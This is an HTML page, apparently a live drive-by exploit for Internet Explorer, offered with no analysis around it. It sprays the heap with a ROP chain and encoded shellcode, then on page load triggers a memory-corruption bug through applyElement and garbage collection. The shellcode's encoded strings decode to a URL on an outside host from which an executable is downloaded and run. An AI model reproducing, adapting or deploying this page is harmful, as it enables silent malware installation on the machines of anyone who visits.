ieexp.htm

1. <!doctype html>
2. <html>
3. <head>
4. <script>
5. function mmfuncLib() {
6. }
7. </script>
8. <script>
9. mmfuncLib.ie = function(maxAlloc, heapBase) {
10. this.paddingStr = "AAAA";
11. this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
12. this.heapBase = (heapBase ? heapBase : 0x150000);
13. while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
14. this.paddingStr += this.paddingStr;
15. }
16. this.mem = new Array();
17. this.flushOleaut32();
18. }
19.  
20. mmfuncLib.ie.prototype.debug = function(msg) {
21. void(Math.atan2(0xbabe, msg));
22. }
23.  
24. mmfuncLib.ie.prototype.allocOleaut32 = function(arg, tag) {
25.  
26. var size;
27.  
28. if (typeof arg == "string" || arg instanceof String)
29. size = 4 + arg.length*2 + 2;
30. else
31. size = arg;
32.  
33.  
34. if ((size & 0xf) != 0)
35. throw "Allocation size " + size + " must be a multiple of 16";
36.  
37.  
38. if (this.mem[tag] === undefined)
39. this.mem[tag] = new Array();
40.  
41. if (typeof arg == "string" || arg instanceof String) {
42.  
43. this.mem[tag].push(arg.substr(0, arg.length));
44. }
45. else {
46.  
47. this.mem[tag].push(this.padding((arg-6)/2));
48. }
49. }
50.  
51.  
52. mmfuncLib.ie.prototype.debugHeap = function(enable) {
53.  
54. if (enable == true)
55. void(Math.atan(0xbabe));
56. else
57. void(Math.asin(0xbabe));
58. }
59.  
60. mmfuncLib.ie.prototype.debugBreak = function(msg) {
61. void(Math.acos(0xbabe));
62. }
63. mmfuncLib.ie.prototype.padding = function(len) {
64. if (len > this.paddingStr.length)
65. throw "Requested padding string length " + len + ", only " + this.paddingStr.length + " available";
66.  
67. return this.paddingStr.substr(0, len);
68. }
69. mmfuncLib.ie.prototype.round = function(num, round) {
70. if (round == 0)
71. throw "Round argument cannot be 0";
72.  
73. return parseInt((num + (round-1)) / round) * round;
74. }
75.  
76. mmfuncLib.ie.prototype.hex = function(num, width)
77. {
78. var digits = "0123456789ABCDEF";
79.  
80. var hex = digits.substr(num & 0xF, 1);
81.  
82. while (num > 0xF) {
83. num = num >>> 4;
84. hex = digits.substr(num & 0xF, 1) + hex;
85. }
86.  
87. var width = (width ? width : 0);
88.  
89. while (hex.length < width)
90. hex = "0" + hex;
91.  
92. return hex;
93. }
94. mmfuncLib.ie.prototype.addr = function(addr) {
95. //test
96. return unescape("%u" + this.hex(addr & 0xFFFF, 4) + "%u" + this.hex((addr >> 16) & 0xFFFF, 4));
97. }
98. mmfuncLib.ie.prototype.freeOleaut32 = function(tag) {
99.  
100. delete this.mem[tag];
101.  
102.  
103. CollectGarbage();
104. }
105.  
106. mmfuncLib.ie.prototype.alloc = function(arg, tag) {
107.  
108. var size;
109.  
110.  
111. if (typeof arg == "string" || arg instanceof String)
112. size = 4 + arg.length*2 + 2;
113. else
114. size = arg;
115.  
116.  
117. if (size == 32 || size == 64 || size == 256 || size == 32768)
118. throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
119.  
120.  
121. this.allocOleaut32(arg, tag);
122. }
123.  
124.  
125. mmfuncLib.ie.prototype.free = function(tag) {
126.  
127.  
128. this.freeOleaut32(tag);
129.  
130.  
131. this.flushOleaut32();
132. }
133.  
134. mmfuncLib.ie.prototype.gc = function() {
135.  
136. this.debug("Running the garbage collector");
137. CollectGarbage();
138.  
139. this.flushOleaut32();
140. }
141.  
142. mmfuncLib.ie.prototype.freeList = function(arg, count) {
143.  
144. var count = (count ? count : 1);
145.  
146. for (var i = 0; i < count; i++) {
147. this.alloc(arg);
148. this.alloc(arg, "freeList");
149. }
150. this.alloc(arg);
151.  
152. this.free("freeList");
153. }
154.  
155. mmfuncLib.ie.prototype.flushOleaut32 = function() {
156.  
157. this.debug("Flushing the OLEAUT32 cache");
158.  
159.  
160.  
161. this.freeOleaut32("oleaut32");
162.  
163.  
164.  
165. for (var i = 0; i < 6; i++) {
166. this.allocOleaut32(32, "oleaut32");
167. this.allocOleaut32(64, "oleaut32");
168. this.allocOleaut32(256, "oleaut32");
169. this.allocOleaut32(32768, "oleaut32");
170. }
171. }
172.  
173. mmfuncLib.ie.prototype.lookaside = function(arg, count) {
174.  
175. var size;
176.  
177.  
178. if (typeof arg == "string" || arg instanceof String)
179. size = 4 + arg.length*2 + 2;
180. else
181. size = arg;
182.  
183.  
184. if ((size & 0xf) != 0)
185. throw "Allocation size " + size + " must be a multiple of 16";
186.  
187. if (size+8 >= 1024)
188. throw("Maximum lookaside block size is 1008 bytes");
189.  
190. var count = (count ? count : 1);
191.  
192. for (var i = 0; i < count; i++)
193. this.alloc(arg, "lookaside");
194.  
195. this.free("lookaside");
196. }
197.  
198. mmfuncLib.ie.prototype.lookasideAddr = function(arg)
199. {
200. var size;
201.  
202.  
203. if (typeof arg == "string" || arg instanceof String)
204. size = 4 + arg.length*2 + 2;
205. else
206. size = arg;
207.  
208.  
209. if ((size & 0xf) != 0)
210. throw "Allocation size " + size + " must be a multiple of 16";
211.  
212. if (size+8 >= 1024)
213. throw("Maximum lookaside block size is 1008 bytes");
214.  
215.  
216.  
217.  
218. return this.heapBase + 0x688 + ((size+8)/8)*48;
219. }
220.  
221. mmfuncLib.ie.prototype.vtable = function(shellcode, jmpecx, size) {
222. var vtable = unescape("%u9090%u7ceb")
223. var size = (size ? size : 1008);
224.  
225.  
226. if ((size & 0xf) != 0)
227. throw "Vtable size " + size + " must be a multiple of 16";
228.  
229. if (shellcode.length*2 > size-138)
230. throw("Maximum shellcode length is " + (size-138) + " bytes");
231.  
232.  
233. for (var i = 0; i < 124/4; i++)
234. vtable += this.addr(jmpecx);
235.  
236.  
237.  
238. vtable += unescape("%u0028%u0028") +
239. shellcode + heap.padding((size-138)/2 - shellcode.length);
240.  
241. return vtable;
242. }
243.  
244.  
245. var heap_obj = new mmfuncLib.ie(0x20000);
246. var code = unescape("%u5"+"ed6%u77bc%u5ed6%u7"+"7bc%u5ed6%u77bc%u5ed6%u77bc%"+"u5ed6%u77bc%u5ed6%u77bc%u5ed6"+"%u77bc%u5ed6%u77bc%u5ed6%u77bc%"+"u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u362c%u77bd%u5ed5%u77bc%uee15%u77be%uee15%u77be%ufa1c%u77bf%u0400%u0000%u0d13%u77c0%u0040%u0000%ueeef%u77be%ud9bb%u77c0%ua88c%u77bd%u9f92%u77be%ua184%u77be%uaacc%u77bd%ub860%u77be%u1120%u77bc%u3ad9%u77d0%u1025%u77c0");
247. code +=unescape(
248. "%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
249. "%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
250. "%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" +
251. "%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
252. "%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300" +
253. "%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +
254. "%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56" +
255. "%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be" +
256. "%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775" +
257. "%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd" +
258. "%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e" +
259. "%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a" +
260. "%u6870%u7474%u3a70%u2f2f%u756d%u756d%u322e%u7535" +
261. "%u632e%u6d6f%u692f%u6565%u7078%u6f6c%u6572%u652e" +
262. "%u6578%u0000");
263.  
264. var nops = unescape("%u4579%u796d");
265. while (nops.length < 0x80000) nops += nops;
266. var offset = nops.substring(0, 0x586);
267. var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
268. while (shellcode.length < 0x40000) shellcode += shellcode;
269. var block = shellcode.substring(0, (0x80000-6)/2);
270. heap_obj.gc();
271. for (var i=1; i < 0x300; i++) {
272. heap_obj.alloc(block);
273. }
274.  
275.  
276. function AAFunc11()
277. {
278. var e0 = null;
279. var e1 = null;
280. var e2 = null;
281.  
282. try {
283. e0 = document.getElementById("a");
284. e1 = document.getElementById("b");
285. e2 = document.createElement("q");
286. e1.applyElement(e2);
287. e1.appendChild(document.createElement('button'));
288. e1.applyElement(e0);
289. e2.outerText = "";
290. e2.appendChild(document.createElement('body'));
291. } catch(e) { }
292. CollectGarbage();
293. var eip = window;
294. var data = "UWIhkMJUrpWyguJFdkZuczuabURjXtlNWejnRstva";
295. eip.location = unescape("%u0b30%u0c0c" + data);
296. }
297.  
298. </script>
299. </head><body onload="eval(AAFunc11())"><form id="a"></form><dfn id="b"></dfn></body></html>